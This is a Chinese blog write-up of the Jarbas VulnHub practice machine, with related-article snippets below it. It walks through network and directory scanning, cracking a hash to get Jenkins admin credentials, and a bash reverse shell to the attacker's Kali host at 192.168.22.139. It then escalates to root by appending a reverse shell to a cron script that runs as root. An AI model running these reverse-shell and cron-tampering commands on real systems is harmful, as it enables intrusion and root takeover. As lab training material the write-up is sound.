小白渗透之旅——Jarbas靶场(急速版)

于 2024-05-30 00:08:38 发布
阅读量747 收藏 11
点赞数 8
分类专栏: 各种渗透靶场 文章标签: 笔记 web安全 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52849046/article/details/139299200
版权

前言

        这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。

        ps:这是小编以前大二的期末渗透考题,所以比较简洁( ‘-ωก̀ )

一、环境配置及靶场下载


        靶场下载地址:https://download.vulnhub.com/jarbas/Jarbas.zip

1.下载靶场文件,然后打开

        靶机和攻击机设置为同一网段就好,小编设置的是kali还有靶机都是NAT模式

二、信息收集

1、探测主机存活

        靶场扫描nmap -sV 192.16.22.0/24

2、目录扫描 

        扫描网站目录 dirb http://192.168.22.145/ -X .html

3、进入access.html 

        进入网站,对加密密码进行ND5解密,获得网站后台账号密码eder/vipsu

三、漏洞利用

1、进入后台

        进入网站后台 192.168.22.139:8080

2、构建任务 进行 shell 反弹

        创建反弹shell:bash -i &> /dev/tcp/192.168.22.139/1111 0>&1

        跟着下面图片的步骤:

         注意ip还有端口写上kali的ip和端口

四、kali上线 

1.kali起监听 

        在kali监听1111端口,因为刚刚我们写的shell反弹到kali的1111端口

        nc -lvnp 1111                                                                                  //监听1111端口

2.启动脚本

五、crontab计划任务提权

1、上线成功,查看定时任务

        查看计划任务发现flag1还有flag3

        cat  /etc/crontab                                                             //查看计划任务·

        查看存在一个以root权限执行的脚本,每五分钟执行一次,尝试写入反弹shell

2、计划任务提权

        在/etc/script/CleaningScript.sh计划任务中写入反弹shell

        shell  echo "/bin/bash -i &> /dev/tcp/192.168.22.139/2222 0>&1" >> /etc/script/CleaningScript.sh

3、然后在开一个终端,起监听

六、上线成功,查找flag

        1、因为这个脚本每五分钟运行一次,所以需要等五分钟

         2、上线成功,可以看到是root权限

        查找flag  find / -name “*flag*”                                  //在系统中查找带有flag的文件

        搞定!!! 

信安白two
关注
专栏目录
红队内网攻防渗透:内网渗透之Linux内网权限提升技术:NFS&Cron&PATH
HACKONE的博客
06-08 65
NFS是一种基于TCP/IP 传输的网络文件系统协议,通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源。通过对计划任务中的文件的权限查看,发现具有读写执行的权限,编写计划任务覆盖源文件的内容用来反弹shell。通过扫描发现还开放了8080端口,这里缺少登陆密码,前面的加密的access.html就有这里的密码。ls -lia /etc/script/CleaningScript.sh #查看对任务文件的权限。cd /mnt/nfs # 目标机。
vunhub 靶机之旅-2
ashen的博客
12-09 689
YouTube:https://www.youtube.com/watch?v=GVWPVZ0uRpU Jarbas walkthrough | vulnhub Gobuster 子域名/目录暴力工具 -P string:基本AUTH的密码(仅为DIR模式) -U string:基本AUTH的用户名(仅为DIR模式) -a string:设置用户代理字符串(DIR模式) -c string:用于请...
红队渗透靶场Jarbas靶场(超详细)
xf555er的博客
11-26 1397
Jarbas靶场演练, 红队渗透必学靶场
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1285
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
【学渗透靶机 ——JARBAS
jieli0901227的博客
04-05 269
通过nmap 扫描结果发现有两个IP,192.168.241.140 为 KALI。这个页面中加密字符串,通过kali工具判断有可能是MD5,passwd 能够查看,而shadow 文件没有查看权限。尝试访问/etcpasswd 和/etc/shadow。使用burp 抓包后台登录界面进行尝试爆破。发现80端口有两个页面,而8080没有。(2)还发现构造项目中可以命令执行。写入反弹shell ,保存后。访问index为默认页面,但是反弹shell没有成功。成功拿到webshell。计划任务中脚本有写权限,
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 350
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
Vulnhub系列Jarbas靶机(三种方法)
2301_80203701的博客
12-18 1113
哎,有个root和jenkins但是不是/bash ,也没有什么,那看看有什么定时任务吧。好像一直在提示我们java,估计是要利用java相关的知识,可惜我不会(先走着看看吧)。换个端口进行反弹shell万一与上次的冲突就完蛋了,那就吃点东西等着反弹上来吧。随便点点看,看到一个可以创建任务,应该可以写入一个反弹shell脚本。有可能是个网站后台的登录账号或者是ssh连接的账号密码,先记着。不知道为什么这个靶机有点怪怪的,不知道是不是我搞的太多了。开放了22,80,3306,8080端口这四个全是突破口。
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 839
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 811
这次的靶机是vulnhub靶机Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
《PyPI上的jarbas_hive_mind-0.3.5.tar.gz:探索Hadoop大数据世界的工具》 PyPI(Python Package Index)是Python开发者的重要资源库,它为全球的Python程序员提供了丰富的软件包和模块。在PyPI上,我们可以找到名...
jarbas--靶机实操详解
qq_61802750的博客
10-12 303
枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。80端口是http,攻击面很大,可以优先考虑。我们现在就在jackson这个账户,有不正常的交互。我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。我们试一下,使用eder账号,密码使用vipsu。那我们再写入一个shell,打开监听,看看是否是root权限。index是我们当前的页面,我们先访问一下access。
渗透靶场Jarbas
m0_56190544的博客
07-09 558
完整的解析了vulnhub靶场中的Jarbas渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
jarbas靶场渗透笔记
m0_60571990的博客
03-10 403
jarbas靶场渗透笔记
红队靶机jarbas靶机复现,反弹sehll提权,用定时任务来提升至root用户
最新发布
m0_58116751的博客
05-15 1984
发现靶机IP为192.168.38.134 开放了22,3306,80,8080我们可以进行的远程连接 找他web服务的漏洞,数据库如果能搜寻到泄露的信息也可以进行渗透,80端口有限级较高我们先测试他的web服务,在看下他的8080端口有个登录页面。我们显示发现了他可植入的初始shell在渗透过程中发现了他的权限并不够那我们就要思维拓宽来看他的一些用户,进程,和启动项想办法移动到其它账号之中。我们用cat /etc/crontab来查看他的一个定时任务,他有一个5分钟执行一次的脚本我们来查看他。
JARBAS - VulnHub(漏洞靶场渗透测试)
Start C的博客
12-06 365
VulnHub的一个靶场
红队笔记-2:JARBAS打靶流程,【一步教学,一步到位】
2401_84139697的博客
04-09 964
1.主机发现和端口扫描:nmap扫描发现靶机是192.168.200.140,和存活端口22,80,3306,8080。2.80和8080端口:从web角度入手,80端口是web,8080端口是web的后台,对其web先进行目录扫描,发现普通扫扫描没有扫描发现,尝试添加参数扫描-X,扫描后发现access.html文档,通过破解access.html页面的密文获得账号密码,组合账号密码登录后台成功。
红队打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1941
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
红队笔记-2:JARBAS打靶流程(vulnhub),2024年最新vivoLinux运维面试
2401_83974370的博客
04-14 347
最全的Linux教程,Linux从入门到精通。
vulnhub-Jarbas-wp
yutianovo的博客
09-04 329
靶机描述 http://blog.yutian233.xyz/index.php/ If you want to keep your hacking studies, please try out this machine! Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s. Objective: Get root shell! 下载 https://www.vulnhub.com/entr
Jarbas-靶场
qq_46187131的博客
03-18 966
首先nmap做端口扫描,发现80和8080两个端口开放通过两个端口的Web浏览和目录扫描,发现8080是内容管理系统通过目录扫描得知账号密码,并成功登录新建一个项目的时候,写进了反弹shell,并拿到初始shell的权限收集提权信息发现自动任务有root权限运行的,并进行利用,写入shell成功拿到root权限,并查看flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值